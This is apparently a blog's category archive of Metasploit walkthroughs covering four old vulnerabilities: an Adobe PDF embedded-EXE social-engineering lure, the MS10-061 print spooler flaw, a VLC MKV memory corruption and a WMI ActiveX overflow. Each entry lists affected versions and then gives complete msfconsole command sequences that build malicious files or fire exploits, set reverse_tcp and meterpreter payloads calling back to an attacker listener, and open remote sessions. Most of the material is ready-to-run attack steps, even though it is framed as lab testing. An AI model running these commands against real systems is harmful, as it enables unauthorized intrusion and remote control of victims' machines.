Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2010-1240 : Adobe PDF Embedded EXE Social Engineering

Timeline :

Vulnerability discovered & disclosed by Didier Stevens the 2010-03-29
Exploit-DB PoC provided by Didier Stevens the 2010-03-31

    PoC provided by :

jduck
Colin Ames

    Reference(s) :

CVE-2010-1240
EDB-ID-11987

    Affected version(s) :

Adobe Reader 9.3.2 and earlier versions for Windows, Macintosh, and UNIX
Adobe Acrobat 9.3.2 and earlier versions for Windows and Macintosh4

    Tested on Windows XP SP3 with :

    Adobe Reader 9.3.0

    Description :

This module embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack.

    Commands :

use exploit/windows/fileformat/adobe_pdf_emb­edded_exe
set OUTPUTPATH /home/eromang
set INFILENAME metasploit.pdf
set TARGET 0
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
expoit -j

sessions -i 1
dir

MS10-061 : Microsoft Print Spooler Service Impersonation Vulnerability

Timeline :

Vulnerability exploited by the StuxNet worm
Security update released by Microsoft (KB2347290) the 2010-09-14
Metasploit PoC released the 2010-09-17

    PoC provided by :

jduck
hdm

    Reference(s) :

CVE-2010-2729
MS10-061

    Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 SP1 and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Windows 7 32
Windows 7 x64
Windows Server 2008 R2 x64

    Tested on Windows XP SP3

    Description :

This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes an EXE and then (ab)uses the impersonation vulnerability a second time to create a secondary RPC connection to the \PIPE\ATSVC named pipe. We then proceed to create a remote AT job using a blind NetrJobAdd RPC call.

    Commands :

use exploit/windows/smb/ms10_061_spoolss
nmap 192.168.178.41
set RHOST 192.168.178.41
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig

CVE-2011-0531 : VideoLAN VLC MKV Memory Corruption

Timeline :

Vulnerability discovered by Dan Rosenberg
Vulnerability privately submitted to the vendor by Dan Rosenberg the 2010-01-26
Coordinated vulnerability disclosure and new version released the 2010-01-30
Metasploit PoC released the 2010-02-01

    PoC provided by :

Dan Rosenberg

    Reference(s) :

CVE-2011-0531
SA1102

    Affected version(s) :

VideoLAN VLC version 1.1.6 and previous versions.
With version 1.1.1 to 1.1.6 you will only get a DoS of VLC, caused by SetProcessDEPPoly.

    Tested on Windows XP SP3 with :

    VideoLAN VLC 1.1.0 released the 2010-06-22, version how don’t contain SetProcessDEPPoly.

    Description :

This module exploits an input validation error in VideoLAN VLC version 1.1.6 and previous versions. By creating a malicious MKV or WebM file, a remote attacker could execute arbitrary code. NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to permanently enable NX support on machines that support it. As such, This module will only work against systems that do not support NX or are too old to have SetProcessDEPPolicy.

Since 2011-02-08, jduck from Metasploit team, has update vlc_webm to work with DEP !

    Commands :

use exploit/windows/fileformat/vlc_webm
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
getuid
sysinfo
ipconfig

Microsoft WMI Administration Tools ActiveX Buffer Overflow

Timeline :

Vulnerability & PoC disclosed by WooYun the 2010-12-22
Metasploit PoC provided the 2010-12-22

    PoC provided by :

WooYun
MC
jduck

    Reference(s) :

CVE-2010-3973
CVE-2010-4588

    Affected version(s) :

Microsoft WMI Administrative Tools 1.1

    Tested on Windows XP SP3

    Description :

The 22 December WooYun, a security researcher, has disclose a vulnerability, accompanied by a PoC, for WMI Administrative Tools 1.1. These tools are not included by default in Microsoft Windows, and need to be additionally installed on Windows XP. The same day, Metasploit team has release a module to industrialize the exploitation of this vulnerability. This vulnerability is identified by CVE-2010-3973 and CVE-2010-4588. Actually they are no Microsoft planned patch.

    Commands :

use exploit/windows/browser/wmi_admintools
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1

sysinfo
ipconfig